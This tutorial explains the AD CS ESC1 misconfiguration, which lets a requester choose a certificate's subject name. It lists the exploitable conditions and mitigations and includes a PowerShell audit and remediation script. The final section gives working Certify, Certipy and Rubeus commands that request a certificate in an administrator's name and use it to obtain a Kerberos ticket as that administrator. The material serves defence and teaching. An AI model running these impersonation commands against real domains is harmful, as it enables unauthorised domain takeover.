ESC1 – Understand the Arbitrary Subject Alternative Name Vulnerability

ESC1 is the first of the Active Directory Certificate Services (AD CS) certificate template misconfigurations described in SpecterOps' "Certified Pre-Owned" research. It is a misconfiguration of an enterprise CA's template, not a flaw in TLS certificate validation: the template lets the requester put an arbitrary Subject Alternative Name (SAN) into the certificate signing request, and the CA issues a certificate for that name without checking that the requester actually is that principal. A low-privileged domain user can therefore request a certificate whose SAN carries the UPN of a domain administrator and use it to authenticate as that account (via PKINIT for Kerberos, or via Schannel for LDAPS).

A template is exploitable in this way when all of the following hold:

  • The template is published on an enterprise CA and its security descriptor grants the Enroll right to a low-privileged group (Domain Users, Authenticated Users, Domain Computers, Everyone).

  • Manager approval is disabled (CT_FLAG_PEND_ALL_REQUESTS is not set in msPKI-Enrollment-Flag) and no authorised signatures are required (msPKI-RA-Signature is 0).

  • The template's EKUs allow authentication: Client Authentication, PKINIT Client Authentication, Smart Card Logon, Any Purpose, or no EKU at all.

  • The template lets the requester specify the subject (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT is set in msPKI-Certificate-Name-Flag).

To mitigate this vulnerability, it's essential to:

  • Clear CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT on templates that grant authentication EKUs, so the SAN is built from the requester's AD object rather than taken from the CSR; where a requester-supplied SAN is genuinely needed, require manager approval or an authorised signature on the template.

  • Restrict the Enroll right on such templates to the specific groups that need it, and unpublish templates that no longer serve a purpose.

  • Monitor CA issuance for certificates whose SAN does not match the requester (Certificate Services events 4886 and 4887 in the CA's Security log, or the issued-certificates view of the CA database), since an internal CA is not covered by public Certificate Transparency logs.
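The conditions above can be audited directly against AD without Certify or Certipy. The script below is an added example, not code from the original page or from either tool; it assumes a domain-joined Windows host with the RSAT ActiveDirectory module, reads the template and enrollment-service objects from the Configuration partition, and the function names (Test-Esc1Template, Get-LowPrivEnrollers, Remove-EnrolleeSuppliesSubject) are the example's own.

```powershell
# Added example (not from the original page or from Certify/Certipy): audit
# published AD CS templates for the ESC1 conditions and optionally clear the
# SAN flag. Requires the RSAT ActiveDirectory module on a domain-joined host.
Import-Module ActiveDirectory

# Flag bits and OIDs as documented for the msPKI-* template attributes
$CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1   # msPKI-Certificate-Name-Flag
$CT_FLAG_PEND_ALL_REQUESTS         = 0x2   # msPKI-Enrollment-Flag: manager approval
$AuthEkus = @(
    '1.3.6.1.5.5.7.3.2',      # Client Authentication
    '1.3.6.1.5.2.3.4',        # PKINIT Client Authentication
    '1.3.6.1.4.1.311.20.2.2', # Smart Card Logon
    '2.5.29.37.0'             # Any Purpose
)
$EnrollRight = [Guid]'0e10c968-78fb-11d2-90d4-00c04f79dc55'   # Certificate-Enrollment extended right

$domainSid   = (Get-ADDomain).DomainSID.Value
# Everyone, Authenticated Users, Domain Users, Domain Computers: Enroll for any of these is "low-privileged can enroll"
$LowPrivSids = @('S-1-1-0', 'S-1-5-11', "$domainSid-513", "$domainSid-515")

$configNC = (Get-ADRootDSE).configurationNamingContext
$pkiBase  = "CN=Public Key Services,CN=Services,$configNC"

# A template is only reachable if some enterprise CA publishes it
$published = Get-ADObject -SearchBase "CN=Enrollment Services,$pkiBase" `
    -LDAPFilter '(objectClass=pKIEnrollmentService)' -Properties certificateTemplates |
    ForEach-Object { $_.certificateTemplates }

function Get-LowPrivEnrollers {
    # Returns the low-privileged identities holding Enroll (or GenericAll) on the template
    param([string]$TemplateDn)
    $acl  = Get-Acl -Path "AD:\$TemplateDn"
    $hits = foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $rights    = $ace.ActiveDirectoryRights
        $canEnroll = (($rights -band [System.DirectoryServices.ActiveDirectoryRights]::GenericAll) -ne 0) -or
                     ((($rights -band [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight) -ne 0) -and
                      ($ace.ObjectType -eq $EnrollRight -or $ace.ObjectType -eq [Guid]::Empty))
        if (-not $canEnroll) { continue }
        $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
        if ($LowPrivSids -contains $sid) { $ace.IdentityReference.Value }
    }
    @($hits)
}

function Test-Esc1Template {
    param($Template)
    $nameFlag   = [int]$Template.'msPKI-Certificate-Name-Flag'
    $enrollFlag = [int]$Template.'msPKI-Enrollment-Flag'
    $ekus       = @($Template.pKIExtendedKeyUsage | Where-Object { $_ })
    $enrollers  = Get-LowPrivEnrollers -TemplateDn $Template.DistinguishedName

    $suppliesSan  = ($nameFlag -band $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) -ne 0
    $noApproval   = ($enrollFlag -band $CT_FLAG_PEND_ALL_REQUESTS) -eq 0
    $noSignatures = ([int]$Template.'msPKI-RA-Signature') -eq 0
    # An empty EKU list is usable for authentication as well
    $authEku      = ($ekus.Count -eq 0) -or (@($ekus | Where-Object { $AuthEkus -contains $_ }).Count -gt 0)

    [pscustomobject]@{
        Template          = $Template.Name
        DistinguishedName = $Template.DistinguishedName
        SuppliesSAN       = $suppliesSan
        NoApproval        = $noApproval
        NoSignatures      = $noSignatures
        AuthEKU           = $authEku
        LowPrivEnroll     = ($enrollers -join ', ')
        ESC1              = $suppliesSan -and $noApproval -and $noSignatures -and $authEku -and ($enrollers.Count -gt 0)
    }
}

function Remove-EnrolleeSuppliesSubject {
    # Remediation: clear the flag so the CA builds the SAN from AD, not from the CSR
    param([string]$TemplateDn)
    $t   = Get-ADObject -Identity $TemplateDn -Properties 'msPKI-Certificate-Name-Flag'
    $new = ([int]$t.'msPKI-Certificate-Name-Flag') -band (-bnot $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
    Set-ADObject -Identity $TemplateDn -Replace @{ 'msPKI-Certificate-Name-Flag' = $new }
}

$results = Get-ADObject -SearchBase "CN=Certificate Templates,$pkiBase" `
    -LDAPFilter '(objectClass=pKICertificateTemplate)' `
    -Properties 'msPKI-Certificate-Name-Flag','msPKI-Enrollment-Flag','msPKI-RA-Signature','pKIExtendedKeyUsage' |
    Where-Object { $published -contains $_.Name } |
    ForEach-Object { Test-Esc1Template $_ }

$results | Where-Object ESC1 | Format-Table Template, LowPrivEnroll, SuppliesSAN, AuthEKU -AutoSize
# To remediate after review:
# $results | Where-Object ESC1 | ForEach-Object { Remove-EnrolleeSuppliesSubject -TemplateDn $_.DistinguishedName }
```

Running the audit needs only read access to the Configuration partition, which every domain user has; the remediation call needs write access to the template object (normally Enterprise Admins). The per-condition columns are kept in the output so a template that fails only one test, such as one that requires manager approval, is visible as a near miss rather than silently dropped.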

To find vulnerable templates, run Certify (from a domain-joined Windows host) or Certipy (from Linux, with domain credentials):

Certify.exe find /vulnerable
certipy find -u [email protected] -p Passw0rd -dc-ip 172.16.126.128

To abuse the template and impersonate an administrator, request a certificate with the target account's UPN as the alternative name (recent Certipy releases take -upn in place of -alt):

Certify.exe request /ca:dc.theshire.local-DC-CA /template:VulnTemplate /altname:localadmin
certipy req 'corp.local/john:[email protected]' -ca 'corp-CA' -template 'ESC1' -alt '[email protected]'

Certify writes the certificate and private key as PEM, which must be converted to a .pfx with openssl pkcs12 before use; Certipy saves a .pfx directly. Then authenticate with the certificate as the impersonated account (the user name must match the SAN you requested) to obtain a TGT, using Rubeus or Certipy:

Rubeus.exe asktgt /user:localadmin /certificate:localadmin.pfx /password:password123! /ptt
certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'corp.local' -dc-ip <DC_IP>
